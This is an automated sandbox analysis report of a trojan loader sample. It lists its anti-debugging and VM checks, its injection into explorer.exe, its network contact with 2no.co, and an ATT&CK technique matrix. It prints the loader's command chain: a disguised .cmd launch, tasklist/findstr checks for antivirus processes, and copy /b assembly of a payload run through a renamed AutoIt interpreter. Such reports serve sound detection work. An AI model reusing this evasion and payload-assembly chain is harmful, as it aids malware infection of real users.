        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DCD14 FindFirstFileW,FindClose,19_2_007DCD14
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_007DCD9F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_007DF5D8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_007DF735
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_007DFA36
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_007D3CE2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_007D4005
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_007DC2FF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_007D494A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DCD14 FindFirstFileW,FindClose,27_2_007DCD14
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_007DCD9F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_007DF5D8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_007DF735
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_007DFA36
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_007D3CE2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00785D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_00785D13
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: Labs.pif, 00000013.00000002.2258368297.0000000005070000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
        Source: explorer.exe, 0000001C.00000000.2307149631.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
        Source: Labs.pif, 00000013.00000002.2257650033.00000000015B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX>
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 0000001C.00000000.2307149631.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
        Source: explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
        Source: Labs.pif, 00000013.00000002.2258368297.0000000005070000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindows\System32\mswsock.dll
        Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
        Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeAPI call chain: ExitProcess graph end nodegraph_0-3810
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_19-99265
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E45D5 BlockInput,19_2_007E45D5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00785240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_007A5CAC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007EC6D9 LoadLibraryA,GetProcAddress,19_2_007EC6D9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_007C88CD
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079A354 SetUnhandledExceptionFilter,19_2_0079A354
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0079A385
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079A354 SetUnhandledExceptionFilter,27_2_0079A354
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0079A385

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifThread created: C:\Windows\explorer.exe EIP: F419F8Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C9369 LogonUserW,19_2_007C9369
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00785240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D1AC6 SendInput,keybd_event,19_2_007D1AC6
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D51E2 mouse_event,19_2_007D51E2
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_007C88CD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_007D4F1C
        Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000281C000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191562809.0000000000826000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: Labs.pif, explorer.exe, 0000001C.00000000.2299260353.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
        Source: explorer.exe, 0000001C.00000002.2475635005.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2297108695.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
        Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_0079885B cpuid 19_2_0079885B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007B0030 GetLocalTime,__swprintf,19_2_007B0030
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007B0722 GetUserNameW,19_2_007B0722
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_007A416A
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Labs.pifBinary or memory string: WIN_81
        Source: Labs.pifBinary or memory string: WIN_XP
        Source: Labs.pifBinary or memory string: WIN_XPe
        Source: Labs.pifBinary or memory string: WIN_VISTA
        Source: Labs.pifBinary or memory string: WIN_7
        Source: Labs.pifBinary or memory string: WIN_8
        Source: Orders.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,19_2_007E696E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_007E6E32
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Disable or Modify Tools
        21
        Input Capture
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        2
        Valid Accounts
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol21
        Input Capture
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
        Valid Accounts
        2
        Obfuscated Files or Information
        Security Account Manager3
        File and Directory Discovery
        SMB/Windows Admin Shares3
        Clipboard Data
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
        Access Token Manipulation
        1
        DLL Side-Loading
        NTDS117
        System Information Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
        Process Injection
        11
        Masquerading
        LSA Secrets541
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Valid Accounts
        Cached Domain Credentials22
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
        Virtualization/Sandbox Evasion
        DCSync4
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
        Access Token Manipulation
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
        Process Injection
        /etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        Remote System Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1478963 Sample: lSmb6nDsrC.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 37 UaTVQmthThJ.UaTVQmthThJ 2->37 39 206.23.85.13.in-addr.arpa 2->39 41 2no.co 2->41 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 10 lSmb6nDsrC.exe 35 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 31 C:\Users\user\AppData\Local\...\Labs.pif, PE32 12->31 dropped 65 Uses ping.exe to sleep 12->65 67 Drops PE files with a suspicious file extension 12->67 69 Uses ping.exe to check the status of other devices and networks 12->69 16 Labs.pif 12 12->16         started        20 PING.EXE 1 12->20         started        22 cmd.exe 2 12->22         started        24 7 other processes 12->24 signatures7 process8 dnsIp9 33 2no.co 104.21.79.229, 443, 49703 CLOUDFLARENETUS United States 16->33 43 Found API chain indicative of debugger detection 16->43 45 Injects a PE file into a foreign processes 16->45 47 Switches to a custom stack to bypass stack traces 16->47 26 Labs.pif 16->26         started        35 127.0.0.1 unknown unknown 20->35 signatures10 process11 signatures12 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->57 59 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 26->59 61 Maps a DLL or memory area into another process 26->61 63 2 other signatures 26->63 29 explorer.exe 6 26->29 injected process13

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        lSmb6nDsrC.exe68%VirustotalBrowse
        lSmb6nDsrC.exe61%ReversingLabsWin32.Trojan.Privateloader
        lSmb6nDsrC.exe100%AviraTR/AD.Nekark.ccjnv
        lSmb6nDsrC.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif7%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif3%VirustotalBrowse
        No Antivirus matches
        SourceDetectionScannerLabelLink
        2no.co4%VirustotalBrowse
        206.23.85.13.in-addr.arpa1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://word.office.com0%URL Reputationsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
